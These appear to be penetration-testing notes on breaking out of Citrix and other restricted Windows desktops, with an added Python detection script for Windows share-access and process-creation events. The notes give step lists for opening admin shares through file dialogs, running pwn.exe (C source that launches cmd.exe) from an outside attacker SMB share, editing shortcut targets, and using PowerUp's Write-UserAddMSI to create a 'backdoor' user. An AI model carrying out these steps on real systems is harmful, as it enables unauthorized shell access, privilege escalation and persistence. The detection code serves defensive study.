
citrix-breakouts-restricted-environment

Restricted file access

  • We can use any program such as paint, notepad, wordpad, etc.

  • Run any application, and click on File > open

  • Enter the path \\127.0.0.1\c$\users\pmogran

Restricted SMB share

  • Start smbserver on the Ubuntu machine

  • Open paint application, click File > open

  • Put in the address bar \\10.10.16.25\share

  • Click on pwn.exe

Compile pwn.c:

#include <stdlib.h>

/* Launches a command prompt via the absolute path to cmd.exe. */
int main(void) {
  system("C:\\Windows\\System32\\cmd.exe");
  return 0;
}
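From the monitoring side, the two file-dialog techniques above leave traces in Windows Security events 5140 (share access) and 4688 (process creation). The following is an added detection example, not part of the original notes, that flags loopback admin-share access and child processes spawned by the dialog-hosting applications named on this page. It assumes "Audit File Share" and "Audit Process Creation" are enabled and that events have been exported as dictionaries keyed by their event-data field names; the trusted-path list and all sample records are constructed.

```python
# Added detection example; all events below are constructed sample records.
import ntpath

DIALOG_HOSTS = {"mspaint.exe", "notepad.exe", "wordpad.exe"}  # apps named on this page
SHELLS = {"cmd.exe", "powershell.exe"}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")  # assumption
LOOPBACK = {"127.0.0.1", "::1"}


def check_event(ev):
    """Return a finding string for a suspicious event, or None."""
    eid = ev.get("EventID")
    if eid == 5140:  # a network share object was accessed
        share = ev.get("ShareName", "")
        if share.endswith("$") and ev.get("IpAddress") in LOOPBACK:
            return f"loopback admin-share access: {share} by {ev.get('SubjectUserName')}"
    elif eid == 4688:  # a new process has been created
        parent = ntpath.basename(ev.get("ParentProcessName", "")).lower()
        child_path = ev.get("NewProcessName", "")
        child = ntpath.basename(child_path).lower()
        if parent in DIALOG_HOSTS:
            if child in SHELLS:
                return f"shell spawned from {parent}: {child_path}"
            if not child_path.lower().startswith(TRUSTED_ROOTS):
                return f"untrusted binary spawned from {parent}: {child_path}"
    return None


def scan(events):
    return [f for f in map(check_event, events) if f]


SAMPLE_EVENTS = [  # constructed
    {"EventID": 5140, "ShareName": r"\\*\C$", "IpAddress": "127.0.0.1", "SubjectUserName": "ctxuser"},
    {"EventID": 5140, "ShareName": r"\\*\C$", "IpAddress": "10.0.0.8", "SubjectUserName": "admin"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\System32\mspaint.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\System32\notepad.exe",
     "NewProcessName": r"C:\Users\ctxuser\Downloads\tool.exe"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 4688, "ParentProcessName": r"C:\Windows\System32\notepad.exe",
     "NewProcessName": r"C:\Windows\splwow64.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```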

Alternative file explorer

  • Explorer++

  • Q-Dir

PowerShell execution policy bypass

Alternative registry editor

  • simpregedit

  • uberregedit

Modify shortcut file

  • Right-click on the shortcut file > properties

  • In the Target box, enter C:\Windows\System32\cmd.exe

  • Click OK

Script execution

  • Create a new file

  • Put cmd in the file

  • Save as ".bat", ".vbs", ".ps"

  • Import-Module .\PowerUp.ps1

  • Write-UserAddMSI

  • Execute UserAdd.msi

  • Create a new user

  • runas /user:backdoor cmd

Additional resource

  • breaking-out-of-citrix-and-other-restricted-desktop-environments

  • breaking-out-of-windows-environments
